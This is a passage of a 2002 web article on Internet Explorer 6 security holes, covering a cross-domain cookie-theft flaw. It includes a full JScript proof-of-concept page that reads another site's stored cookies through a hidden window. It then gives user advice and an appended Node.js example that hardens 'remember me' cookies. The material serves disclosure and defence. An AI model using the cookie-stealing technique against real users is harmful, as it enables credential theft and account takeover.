
Internet Explorer 6 Hacks And Holes Exposed


Apparently Microsoft were in a little bit of a rush to get Internet Explorer 6 out the door, and forgot to take that extra bit of time to debug and test it for security cracks and holes. In this article Mitchell talks about the latest security holes found in IE6. He shows you how to test your system for vulnerabilities and also provides links to the relevant patches and more information on the holes.

Author Info:
By: Mitchell Harper
February 14, 2002
TABLE OF CONTENTS:
  1. · Internet Explorer 6 Hacks And Holes Exposed
  2. · Mmmmm... gimme cookie!
  3. · Site Impersonation: Mixed Identities
  4. · Direct file access
  5. · Conclusion


Internet Explorer 6 Hacks And Holes Exposed - Mmmmm... gimme cookie!
(Page 2 of 5 )

Cookies have taken their fair share of flak over the last couple of years, with many people insisting that cookies are not safe and that they can easily be "stolen" by another site. I, like many others, had simply dismissed this idea. If cookies are stored in a file on the visitor's computer, how can anyone access them remotely, right? It's just crazy. Indeed it is.

If you're running IE6, then the persistent cookies for any site you've visited can be stolen using two lines of JScript. Let's give this a test. Go and visit any site that lets you create a member's account and also lets you choose a "remember me for later" option. The "remember me for later" option is commonly used so that visitors don't have to re-enter their user credentials every time they return to the site. On smaller, less-global sites, typically a cookie is saved to the visitor's machine containing both the user's login ID and password so that they can be logged in automatically the next time they visit.

Once you've created your new user account, remember the URL of the site. Create a new file named c:\cookie_steal.html and enter the following code into it:

<html>
<head>
<title> Mmmmm Gimme Cookie! </title>
<script language="JavaScript">
<!--
function getCookie()
{
    url = prompt("Enter a fully qualified domain name:");
    win = document.open(url, "urlWin", "top=5000, left=5000, width=1, height=1");
    cookie = win.document.cookie;

    // Close the window, we're done with it
    win.close();

    cookies = cookie.split(';');

    // How many are there?
    num = cookies.length;

    for(i = 0; i < num; i++)
    {
        // Get the cookie from the name/value pair
        curCookie = cookies[i].split('=');

        // Write its name
        document.write("<b>" + curCookie[0] + ": </b>");

        // Write its value
        document.write(curCookie[1] + "<br>");
    }
}
-->
</script>
</head>
<body bgcolor="#FFFFFF" onLoad="getCookie()">
</body>
</html>


Load the page in your browser and enter the full domain name (including the http:// part) of the site that you just joined into the popup box. I won't disclose the details of the site that I joined, but here's the output in my browser:

[Figure: Displaying cookies from another site]

As I'm sure you'll agree, this is one major security flaw: cookies were designed and implemented in such a way that one site could never access the cookies from another site, either by client-side code or server-side scripting technologies. I guess it would be understandable if it took 100,000 lines of code and 25 mainframe computers to get the cookies of a remote site from your PC, but using a couple of lines of JScript to do it just doesn't cut the mustard.

Think of all the ways that these cookies can be used and abused. If Joe Bloggs decides to create a page on his site that uses the JScript function above to get cookies from your PC (which could contain your user ID and password) for your online bank account and takes $10,000, then how do you prove it was him? There's no sign of forced entry, and you don't even know that your account details were stolen. Not good.

If you're using IE6, never select an option to "remember you for later". This could come back and bite you down the track, when you realize that someone has logged into one of your online accounts and has taken some of your personal data or belongings. Also, if you can live without cookies, do so. Set the security options in IE6 to notify you when cookies are being set, and only accept them if they contain jumbled data, such as an encrypted session ID or variable.
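
For site owners, the same advice applies from the server side: a "remember me" cookie should carry an opaque random token rather than the login ID and password. The following Node.js sketch is an added example, not code from the original article; the function names, the cookie name and the in-memory store are assumptions made for illustration.

```javascript
const crypto = require('node:crypto');

// Constructed in-memory store: sha256(token) -> { userId, expires }.
// A real site would keep this table in its database.
const rememberStore = new Map();
const THIRTY_DAYS_MS = 30 * 24 * 60 * 60 * 1000;

const sha256 = (s) => crypto.createHash('sha256').update(s).digest('hex');

// Weak pattern described in the article: whoever reads the cookie
// learns the login ID and the password itself.
function weakRememberCookie(loginId, password) {
  return `remember=${encodeURIComponent(loginId)}:${encodeURIComponent(password)}`;
}

// Hardened pattern: the cookie holds only a random token, and the
// server stores only the token's hash.
function issueRememberCookie(userId, now = Date.now()) {
  const token = crypto.randomBytes(32).toString('hex');
  rememberStore.set(sha256(token), { userId, expires: now + THIRTY_DAYS_MS });
  // HttpOnly keeps the value out of document.cookie; Secure limits it to HTTPS.
  return `remember=${token}; Max-Age=${THIRTY_DAYS_MS / 1000}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Each token is single-use: it is deleted when presented and, if still
// valid, replaced by a fresh one, so a replayed copy is rejected.
function redeemRememberToken(token, now = Date.now()) {
  const key = sha256(String(token));
  const entry = rememberStore.get(key);
  rememberStore.delete(key);
  if (!entry || entry.expires <= now) return null;
  return { userId: entry.userId, setCookie: issueRememberCookie(entry.userId, now) };
}

// Server-side revocation, e.g. after a password change.
function revokeAll(userId) {
  for (const [key, entry] of rememberStore) {
    if (entry.userId === userId) rememberStore.delete(key);
  }
}
```

A token that leaks can be revoked on the server and expires on its own, and it never discloses the password the user may have reused elsewhere.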